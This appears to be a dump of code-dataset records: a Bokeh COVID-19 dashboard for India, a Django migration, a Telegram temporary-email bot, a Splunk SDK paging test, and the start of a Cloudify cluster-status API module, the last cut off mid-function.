REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(s,div, sizing_mode='scale_both')\n\n\ntab3 = Panel(child=fig, title=\"Cases-to-Death Ratio over Time - Statewise\" )\n\n#comparison of states for case-to-death ratio on the latest date\n\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.inf,0)\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.nan,0)\n\ncases_summary_latest_date=cases_summary[cases_summary['day']==latest_date][['loc','case-death-ratio']].reset_index()\nhighest_case_death_ratio_state=cases_summary_latest_date[cases_summary_latest_date['case-death-ratio']==cases_summary_latest_date['case-death-ratio'].max()]['loc'].tolist()[0]\n\nsource=ColumnDataSource(cases_summary_latest_date)\n\nt = figure(x_range=cases_summary_latest_date['loc'],plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nt.title.text='Statewise Case-to-Death Ratio'\nt.title.align='center'\nt.title.text_font_size='17px'\nt.xaxis.axis_label = 'States'\nt.yaxis.axis_label = 'Case-to-Death ratio'\nt.xaxis.major_label_orientation = math.pi/2\n\n#top_states=cases_summary['case-death-ratio'].sort_values(ascending=False)['loc']\n\nt.vbar(cases_summary_latest_date['loc'],top=cases_summary_latest_date['case-death-ratio'], width=0.9, color=[color for name, color in zip(cases_summary_latest_date['loc'], itertools.cycle(Spectral11))])\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('State', '@x'),\n ('Case-to-Death ratio', '@top') # @$name gives the value corresponding to the legend\n]\nt.add_tools(hover)\n\ndiv1 = 
Div(text=\"\"\"Latest Date: {}<br><br>\n Total Cases: {:,}<br>\n Total Deaths: {:,}<br>\n Total Recovered: {:,}<br><br>\n {} has {:,} cases with the highest number of cases per death: {:.2f}<br><br>
\n {} has the highest number of cases of {:,} with {:.2f} cases per death. \"\"\"\n .format(latest_date,cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(),\n cases_summary[cases_summary['day']==latest_date]['deaths'].sum(),\n cases_summary[cases_summary['day']==latest_date]['discharged'].sum(),\n highest_case_death_ratio_state,\n cases_summary[cases_summary['loc']==highest_case_death_ratio_state]['totalConfirmed'][-1:].tolist()[0],\n cases_summary_latest_date['case-death-ratio'].max(),\n highest_state,\n cases_summary[cases_summary['loc']==highest_state]['totalConfirmed'][-1:].tolist()[0],\n cases_summary_latest_date[cases_summary_latest_date['loc']==highest_state]['case-death-ratio'].tolist()[0]),\nwidth=200, height=280)\n\ndiv2=Div(text=\"\"\"Top 6 states with highest cases per death:
{}<br>{}<br>{}<br>{}<br>{}<br>{}<br>
\"\"\"\n .format(cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[0],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[1],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[2],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[3],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[4],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[5]),\n width=200, height=200)\n\nlayout = column(div1, div2)\nlayout= row(t,layout)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\n\ntab4 = Panel(child=layout, title=\"Case-to-Death Ratio - Statewise\" )\n\n\n#Deceased data from cases summary\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'])\ncases_summary.columns=cases_summary.columns.str.replace('summary.','')\n\ncases_summary['daily deaths']=cases_summary['deaths'].diff(1)\ncases_summary['daily confirmed']=cases_summary['total'].diff(1)\ncases_summary['daily discharged']=cases_summary['discharged'].diff(1)\n\n#Total cases over time\ncases_summary['day'] =cases_summary['day'].astype('str')\nu = figure(x_range=cases_summary['day'], plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nu.title.text='Cases over Time - Daily'\nu.title.align='center'\nu.title.text_font_size='17px'\nu.xaxis.axis_label = 'Date'\nu.yaxis.axis_label = 'Cases'\nu.xaxis.major_label_orientation = math.pi/2\n\ntotal_bar=u.vbar(cases_summary['day'], top=cases_summary['daily confirmed'], width=0.9, legend_label='Daily Confirmed', color='#5e4fa2')\ndischarged_bar=u.vbar(cases_summary['day'], top=cases_summary['daily discharged'], width=0.9, legend_label='Daily Recovered', color='#66c2a5')\ndeceased_bar=u.vbar(cases_summary['day'], top=cases_summary['daily deaths'], width=0.9, legend_label='Daily Deaths', color='#3288bd')\n\nhover_total_bar = HoverTool(line_policy='next', renderers=[total_bar])\nhover_total_bar.tooltips = [('Day', '@x'),\n ('Daily Cases', '@top') # @$name gives the value corresponding to the legend\n]\n\nhover_deceased_bar = HoverTool(line_policy='next', renderers=[deceased_bar])\nhover_deceased_bar.tooltips = [('Day', '@x'),\n ('Daily Deaths', '@top') # @$name gives the value corresponding to the legend\n]\n\nhover_discharged_bar = HoverTool(line_policy='next', renderers=[discharged_bar])\nhover_discharged_bar.tooltips = [('Day', '@x'),\n ('Daily Recovered', '@top') # @$name gives the value corresponding to the legend\n]\n\nu.add_tools(hover_total_bar)\nu.add_tools(hover_deceased_bar)\nu.add_tools(hover_discharged_bar)\n\nu.legend.location='top_left'\nu.legend.click_policy='hide'\nu.legend.title='Click to Switch Legend ON/OFF'\n\ntotal_bar.visible=False\ndeceased_bar.visible=False\ndischarged_bar.visible=False\n\ndiv = Div(text=\"\"\"Latest Date: {}
<br>\n Total Cases: {:,}<br>\n Total Deaths: {:,}<br>\n Total Recovered: {:,}<br><br>\n Fatality Rate: {:.2%}<br>\n Recovery Rate: {:.2%}<br><br>\n Important Dates:<br><br>\n {}:<br>The highest number of cases - {:,}<br><br>\n {}:<br>The highest number of deaths - {:,}<br><br>\n {}:<br>
The highest number of Recovery - {:,} \"\"\"\n .format(latest_date,\n cases_summary.iloc[-1]['total'],\n cases_summary.iloc[-1]['deaths'],\n cases_summary.iloc[-1]['discharged'],\n (cases_summary['deaths'][-1:]/cases_summary['total'][-1:]).tolist()[0],\n (cases_summary['discharged'][-1:]/cases_summary['total'][-1:]).tolist()[0],\n cases_summary[cases_summary['daily confirmed']==cases_summary['daily confirmed'].max()]['day'].tolist()[0],\n cases_summary['daily confirmed'].max().astype('int64'),\n cases_summary[cases_summary['daily deaths']==cases_summary['daily deaths'].max()]['day'].tolist()[0],\n cases_summary['daily deaths'].max().astype('int64'),\n cases_summary[cases_summary['daily discharged'] == cases_summary['daily discharged'].max()]['day'].tolist()[0],\n cases_summary['daily discharged'].max().astype('int64')),\nwidth=200, height=100)\nlayout = row(u, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab5 = Panel(child=layout, title=\"Total Cases over Time\" )\n\n\n#daily growth rate in cases and deaths\ncases_summary['daily_case_growth']=cases_summary['total'].pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].pct_change()\ncases_summary['daily_discharge_growth']=cases_summary['discharged'].pct_change()\n\n\ncases_summary['day'] = cases_summary['day'].astype('str')\nv = figure(x_range= cases_summary['day'], plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nv.title.text='Growth Rate over Time - All India'\nv.title.align='center'\nv.title.text_font_size='17px'\nv.xaxis.axis_label = 'Date'\nv.yaxis.axis_label = 'Growth Rate'\nv.xaxis.major_label_orientation = math.pi/2\n\ncase_growth_line=v.line(cases_summary['day'], cases_summary['total'].pct_change(), line_width=2, legend_label='Daily Case Growth Rate', color='#5e4fa2')\ndeath_growth_line=v.line(cases_summary['day'],cases_summary['deaths'].pct_change(), line_width=2, legend_label='Daily Deceased Growth Rate', color='#3288bd')\ndischarge_growth_line=v.line(cases_summary['day'],cases_summary['discharged'].pct_change(), line_width=2, legend_label='Daily Recovered Growth Rate', color='#66c2a5')\n\ncases_summary['day'] = cases_summary['day'].astype('str')\nhover_case_growth = HoverTool(line_policy='next', renderers=[case_growth_line])\nhover_case_growth.tooltips = [('Day', '@x'),\n ('Daily Cases Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_death_growth = HoverTool(line_policy='next', renderers=[death_growth_line])\nhover_death_growth.tooltips = [('Day', '@x{%F}'),\n ('Daily Deceased Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_discharge_growth = HoverTool(line_policy='next', renderers=[discharge_growth_line])\nhover_discharge_growth.tooltips = [('Day', '@x{%F}'),\n ('Daily Recovered Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_death_growth.formatters = {'@x': 'datetime'}\nhover_case_growth.formatters = {'@x': 'datetime'}\nhover_discharge_growth.formatters = {'@x': 'datetime'}\n\nv.add_tools(hover_case_growth)\nv.add_tools(hover_death_growth)\nv.add_tools(hover_discharge_growth)\n\nv.legend.location='top_right'\nv.legend.click_policy='hide'\nv.legend.title='Click to Switch Legend ON/OFF'\n\ncase_growth_line.visible=False\ndeath_growth_line.visible=False\ndischarge_growth_line.visible=False\n\ndiv = 
Div(text=\"\"\"Latest Date: {}
Total Cases: {:,}
Total Deaths: {:,}

Latest Case Growth Rate: {:.2%}
Latest Death Growth Rate: {:.2%}
Latest Recovered Growth Rate: {:.2%}

\n Fatality Rate: {:.2%}
\n Recovery Rate: {:.2%}\"\"\"\n .format(latest_date,cases_summary.iloc[-1]['total'],cases_summary.iloc[-1]['deaths'],cases_summary.iloc[-1]['daily_case_growth'],cases_summary.iloc[-1]['daily_death_growth'],cases_summary.iloc[-1]['daily_discharge_growth'],\n (cases_summary['deaths'][-1:] / cases_summary['total'][-1:]).tolist()[0], (cases_summary['discharged'][-1:]/cases_summary['total'][-1:]).tolist()[0] ),\nwidth=200, height=100)\nlayout = row(v, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab6 = Panel(child=layout, title=\"Growth Rate over Time\" )\n\n\n#Daily cases growth rate - statewise\n\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'], record_path='regional', meta='day')\ncases_summary['loc']=np.where(cases_summary['loc']=='Nagaland#', 'Nagaland', cases_summary['loc'])\n\nlegend_it=[]\n\nw = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nw.title.text='Case Growth Rate'\nw.title.align='center'\nw.title.text_font_size='17px'\nw.xaxis.axis_label = 'Date'\nw.yaxis.axis_label = 'Cases Growth Rate'\n\ncases_summary['daily_case_growth']=cases_summary['totalConfirmed'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_case_growth']=cases_summary['discharged'].groupby(cases_summary['loc']).pct_change()\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=w.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['totalConfirmed'].pct_change(), line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n check_negative_growth = lambda name: name + '*' if (\n (cases_summary[cases_summary['loc'] == name]['totalConfirmed'].pct_change() < 0).any()) else name\n legend_it.append((check_negative_growth(name), [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nw.add_layout(legend1,'right')\nw.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('All Cases Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nw.add_tools(hover)\n\n\ndiv1 = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=700, height=50, align='start')\n\ndiv2 = Div(text=\"\"\"* States with Data Corrected implied through negative growth on a particular date on the timescale\"\"\",\nwidth=700, height=100, align='end')\n\nlayout = column(w, row(div1,div2), sizing_mode='scale_both')\n\ntab7 = Panel(child=layout, title=\"Cases Growth Rate - Statewise\")\n\n#Daily death growth rate- statewise\n\nlegend_it=[]\n\nx = figure(plot_width=1200, plot_height=600, 
x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nx.title.text='Fatality Growth Rate'\nx.title.align='center'\nx.title.text_font_size='17px'\nx.xaxis.axis_label = 'Date'\nx.yaxis.axis_label = 'Fatality Growth Rate'\n\ncases_summary['daily_case_growth']=cases_summary['totalConfirmed'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_case_growth']=cases_summary['discharged'].groupby(cases_summary['loc']).pct_change()\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=x.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['deaths'].pct_change(), line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n check_negative_growth = lambda name: name + '*' if (\n (cases_summary[cases_summary['loc'] == name]['deaths'].pct_change() < 0).any()) else name\n legend_it.append((check_negative_growth(name), [renderer]))\n\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nx.add_layout(legend1,'right')\nx.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Fatality Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nx.add_tools(hover)\n\ndiv1 = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=700, height=50, align='start')\n\ndiv2 = Div(text=\"\"\"* States with Data Corrected implied through negative growth on a particular date on the timescale\"\"\",\nwidth=700, height=100, align='end')\n\nlayout = column(x, row(div1,div2), sizing_mode='scale_both')\n\ntab8 = Panel(child=layout, title=\"Fatality Growth Rate - Statewise\")\n\n#Total Tests done over time\n\ncases_tests=requests.get('https://api.rootnet.in/covid19-in/stats/testing/raw')\njson_data=cases_tests.json()\ncases_tests=pd.json_normalize(data=json_data['data'])\n\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\ncases_tests['timestamp']=cases_tests['timestamp'].dt.date\n\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\nsource=ColumnDataSource(cases_tests)\ny = figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\", x_axis_type='datetime')\ny.title.text='COVID19 Tests over Time'\ny.title.align='center'\ny.title.text_font_size='17px'\ny.xaxis.axis_label = 'Date'\ny.yaxis.axis_label = 'Tests Count'\n\nsample_test=y.vbar(x=cases_tests['timestamp'], bottom=cases_tests['totalSamplesTested'], width=timedelta(days=0.5), color='#5e4fa2', alpha=1,\n legend_label=\"Samples Tested\")\npositive_test=y.vbar(x=cases_tests['timestamp'], top=cases_summary.groupby(['day'])['totalConfirmed'].sum(), width=timedelta(days=0.5), color='#3288bd', alpha=1,\n legend_label=\"Tested Positive\")\n\nhover = HoverTool(line_policy='next', renderers=[sample_test])\nhover.tooltips = [('Date', '@x{%F}'),\n ('Tests Count', '@bottom') # @$name gives 
the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\n\nhover_pos = HoverTool(line_policy='next', renderers=[positive_test])\nhover_pos.tooltips = [('Date', '@x{%F}'),\n ('Positive Count', '@top') # @$name gives the value corresponding to the legend\n]\nhover_pos.formatters = {'@x': 'datetime'}\n\ny.add_tools(hover)\ny.add_tools(hover_pos)\ny.legend.location='top_left'\n\ndiv = Div(text=\"\"\"Latest Date: {}

Total Tests: {:,}

Total Cases: {:,}
Total Deaths: {:,}\"\"\".format(latest_date,cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'), cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(), cases_summary[cases_summary['day']==latest_date]['deaths'].sum()),\nwidth=200, height=100)\nlayout = row(y, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab9 = Panel(child=layout, title=\"All India Tests over Time\")\n\n\n#Testing Growth Rate\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\ncases_tests['daily_tests']=cases_tests['totalSamplesTested'].diff(1)\ncases_tests['daily_confirmed']=cases_tests['totalPositiveCases'].diff(1)\n\n\nz = figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\", x_axis_type='datetime', y_range=Range1d(start=0, end=cases_tests['totalSamplesTested'].max()))\nz.title.text='COVID19 Tests Growth Rate over Time'\nz.title.align='center'\nz.title.text_font_size='17px'\nz.xaxis.axis_label = 'Date'\nz.yaxis.axis_label = 'Tests Count'\n\nz.extra_y_ranges = {'tests_growth_rate': Range1d(start=cases_tests['totalSamplesTested'].pct_change().min(), end=cases_tests['totalSamplesTested'].pct_change().max())}\nz.add_layout(LinearAxis(y_range_name='tests_growth_rate'), 'right')\n\nsample_test_growth=z.vbar(x=cases_tests['timestamp'],top=cases_tests['totalSamplesTested'].pct_change() , width=timedelta(days=0.5), color='#5e4fa2', alpha=1, y_range_name='tests_growth_rate', legend_label='Tests Growth Rate')\nsample_test=z.line(cases_tests['timestamp'], cases_tests['daily_tests'], line_width=2, color='#d53e4f', alpha=1, legend_label=\"Daily Tests Count\")\n\nhover = HoverTool(line_policy='next', renderers=[sample_test_growth])\nhover.tooltips = [('Date', '@x{%F}'),\n ('Tests Growth Rate', '@top{0.:00%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\n\nhover_growth = HoverTool(line_policy='next', renderers=[sample_test])\nhover_growth.tooltips = [('Date', '@x{%F}'),\n ('Tests Count', '@y') # @$name gives the value corresponding to the legend\n]\nhover_growth.formatters = {'@x': 'datetime'}\n\nz.add_tools(hover)\nz.add_tools(hover_growth)\nz.legend.click_policy='hide'\nz.legend.title='Click to Switch Legend ON/OFF'\n\ndiv = Div(text=\"\"\"Latest Date: {}

Total Tests: {:,}

Total Cases: {:,}
Total Deaths: {:,}\"\"\".format(latest_date,cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'), cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(), cases_summary[cases_summary['day']==latest_date]['deaths'].sum()),\nwidth=200, height=100)\n\nlayout = row(z, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab10 = Panel(child=layout, title=\"All India Tests Growth Rate\")\n\n\n#Correlation between Tests Count and Confirmed Cases\n\ncases_tests_without_na=cases_tests.dropna(axis=0, how='any')\n\nfig=figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\")\nfig.title.text='Correlation of Tests Vs Confirmed Cases'\nfig.title.align='center'\nfig.title.text_font_size='17px'\nfig.xaxis.axis_label = 'Confirmed Cases'\nfig.yaxis.axis_label = 'Tests Count'\nfig.x_range=Range1d(0,cases_tests_without_na['daily_confirmed'].max() )\n\n\nscatterplot=fig.circle(cases_tests_without_na['daily_confirmed'],cases_tests_without_na['daily_tests'], legend_label='Daily Tests Vs Confirmed Cases')\n\npar = np.polyfit(cases_tests_without_na['daily_confirmed'],cases_tests_without_na['daily_tests'], 1, full=True)\nslope=par[0][0]\nintercept=par[0][1]\ny_predicted = [slope*i + intercept for i in cases_tests_without_na['daily_confirmed']]\n\nLinearRegression = fig.line(cases_tests_without_na['daily_confirmed'],y_predicted,color='red',legend_label='y='+str(round(slope,2))+'x+'+str(round(intercept,2)))\ncorrelation=cases_tests_without_na[['daily_confirmed','daily_tests']].corr('pearson')['daily_tests'][0]\n\nhover = HoverTool(line_policy='next', renderers=[scatterplot])\nhover.tooltips = [('Confirmed Cases', '@x'),\n ('Tests Count', '@y') # @$name gives the value corresponding to the legend\n]\n\nhover_line = HoverTool(line_policy='next', renderers=[LinearRegression])\nhover_line.tooltips = [('Estimated Confirmed Cases at given rate', '@x'),\n ('Tests Count ', '@y') # @$name gives the value corresponding to the legend\n]\nfig.add_tools(hover)\nfig.add_tools(hover_line)\nfig.legend.location='top_left'\n\nlabel=Label(x=-300, y=50, x_units='screen', y_units='screen', text=\"Pearson Correlation (R\\u00b2): {:.2}\".format(correlation), render_mode='css', text_font_size='14px')\nfig.add_layout(label, 'right')\n\ndiv = Div(text=\"\"\"Latest Date: {}

\n Total Tests: {:,}
\n Total Cases: {:,}

\n Pearson Correlation (R): {:.2}

\"\"\"\n .format(latest_date,\n cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'),\n cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(),\n correlation),\nwidth=200, height=100)\n\nlayout = row(fig, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab11 = Panel(child=layout, title=\"Correlation - Tests Vs Cases\")\n\ntabs = Tabs(tabs=[tab1, tab2, tab3, tab4, tab5, tab6, tab7, tab8, tab9, tab10, tab11])\n\n#output_file('Statewise Cases and Deaths-Bokeh.html')\n\nbokeh_doc.add_root(tabs)\n\n","sub_path":"Coronavirus_realtime_india.py","file_name":"Coronavirus_realtime_india.py","file_ext":"py","file_size_in_byte":32258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466918819","text":"# encoding: utf8\nfrom django.db import models, migrations\nimport open511_server.utils.xmlmodel\nimport django.contrib.gis.db.models.fields\nimport open511_server.fields\nimport open511_server.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('open511', '0002_jurisdiction'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Camera',\n fields=[\n ('created', models.DateTimeField(default=open511_server.models._now, db_index=True)),\n ('updated', models.DateTimeField(default=open511_server.models._now, db_index=True)),\n ('internal_id', models.AutoField(serialize=False, primary_key=True)),\n ('id', models.CharField(db_index=True, max_length=100, blank=True)),\n ('jurisdiction', models.ForeignKey(to='open511.Jurisdiction', to_field='internal_id')),\n ('external_url', models.URLField(db_index=True, blank=True)),\n ('xml_data', open511_server.fields.XMLField(default='')),\n ('geom', django.contrib.gis.db.models.fields.PointField(srid=4326, geography=True)),\n ],\n options={\n u'ordering': ('internal_id',),\n u'unique_together': set([('id', 'jurisdiction')]),\n u'abstract': False,\n },\n bases=(models.Model, open511_server.utils.xmlmodel.XMLModelMixin),\n ),\n ]\n","sub_path":"open511_server/migrations/0003_camera.py","file_name":"0003_camera.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"616213874","text":"import logging\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom config import API_TOKEN\r\nimport keyboard as kb\r\nfrom onesec_api import Mailbox\r\nimport json\r\nimport asyncio\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def texthandler(m: types.Message):\r\n\tif m.text != '✉️ Получить почту':\r\n\t\tawait m.answer(f'Приветствую тебя, {m.from_user.mention}\\nЭтот бот создан для быстрого получения временной почты.\\nНажми на кнопу ниже 👇', reply_markup=kb.menu)\r\n\telif m.text == '✉️ Получить почту':\r\n\t\tma = Mailbox('')\r\n\t\temail = f'{ma._mailbox_}@1secmail.com'\r\n\t\tawait m.answer(f'📫 Твоя почта: {email}\\n\\nОтправляй письмо,почта проверяется автоматически, каждые 5 секунд, если придет новое письмо, мы вас об этом оповестим!\\n\\nНа 1 почту можно получить только - 1 письмо.\\n\\nРЕКОМЕНДУЕМ ПОДПИСАТСЯ НА НАШ КАНАЛ @statie')\r\n\t\twhile True:\r\n\t\t\tmb = ma.filtred_mail()\r\n\t\t\tif isinstance(mb, list):\r\n\t\t\t\tmf = ma.mailjobs('read',mb[0])\r\n\t\t\t\tjs = 
mf.json()\r\n\t\t\t\tfromm = js['from']\r\n\t\t\t\ttheme = js['subject']\r\n\t\t\t\tmes = js['textBody']\r\n\t\t\t\tawait m.answer(f'📩 Новое письмо:\\nОт: {fromm}\\nТема: {theme}\\nСообщение: {mes}', reply_markup=kb.menu, parse_mode='HTML')\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\t\tawait asyncio.sleep(5)\r\n \r\n\r\nif __name__ == '__main__':\r\n\texecutor.start_polling(dp, skip_updates=True) # Launch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
self.check_collection(service.indexes)\n\n def test_inputs(self):\n # The Inputs collection is an aggregated view of the various REST API\n # input endpoints, and does not support the paging interface.\n service = client.connect(**self.opts.kwargs)\n count = len(service.inputs.list())\n self.check_iterable(service.inputs, count)\n\n def test_jobs(self):\n # The Jobs REST API endpoint does not support the paging interface.\n service = client.connect(**self.opts.kwargs)\n count = len(service.jobs.list())\n self.check_iterable(service.jobs, count)\n\n def test_loggers(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.loggers)\n\n def test_messages(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.messages)\n\n def test_roles(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.roles)\n\n def test_users(self):\n service = client.connect(**self.opts.kwargs)\n self.check_collection(service.users)\n\nif __name__ == \"__main__\":\n testlib.main()\n\n","sub_path":"tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185059217","text":"#########\n# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\nfrom flask import request, current_app\nfrom flask_restful_swagger import swagger\n\nfrom cloudify._compat import text_type\nfrom cloudify.cluster_status import CloudifyNodeType, ServiceStatus\n\nfrom manager_rest.rest import responses\nfrom manager_rest.utils import get_formatted_timestamp\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.rest.rest_decorators import marshal_with\nfrom manager_rest.storage import models, get_storage_manager\nfrom manager_rest.security import SecuredResourceBannedSnapshotRestore\nfrom manager_rest.cluster_status_manager import (STATUS,\n get_cluster_status,\n write_status_report)\nfrom manager_rest.rest.rest_utils import (parse_datetime_string,\n verify_and_convert_bool,\n get_json_and_verify_params)\n\n\nclass ClusterStatus(SecuredResourceBannedSnapshotRestore):\n @staticmethod\n def _get_request_dict():\n request_dict = get_json_and_verify_params({\n 'reporting_freq': {'type': int},\n 'report': {'type': dict},\n 'timestamp': {'type': text_type}\n })\n return request_dict\n\n def _write_report(self, node_id, model, node_type):\n report_dict = self._get_request_dict()\n write_status_report(node_id, model, node_type, report_dict)\n\n @swagger.operation(\n responseClass=responses.Status,\n nickname=\"cluster-status\",\n notes=\"Returns state of the Cloudify cluster\"\n )\n @authorize('cluster_status_get')\n @marshal_with(responses.Status)\n def get(self):\n \"\"\"Get the status of the entire cloudify cluster\"\"\"\n summary_response = verify_and_convert_bool(\n 'summary',\n request.args.get('summary', False)\n )\n 
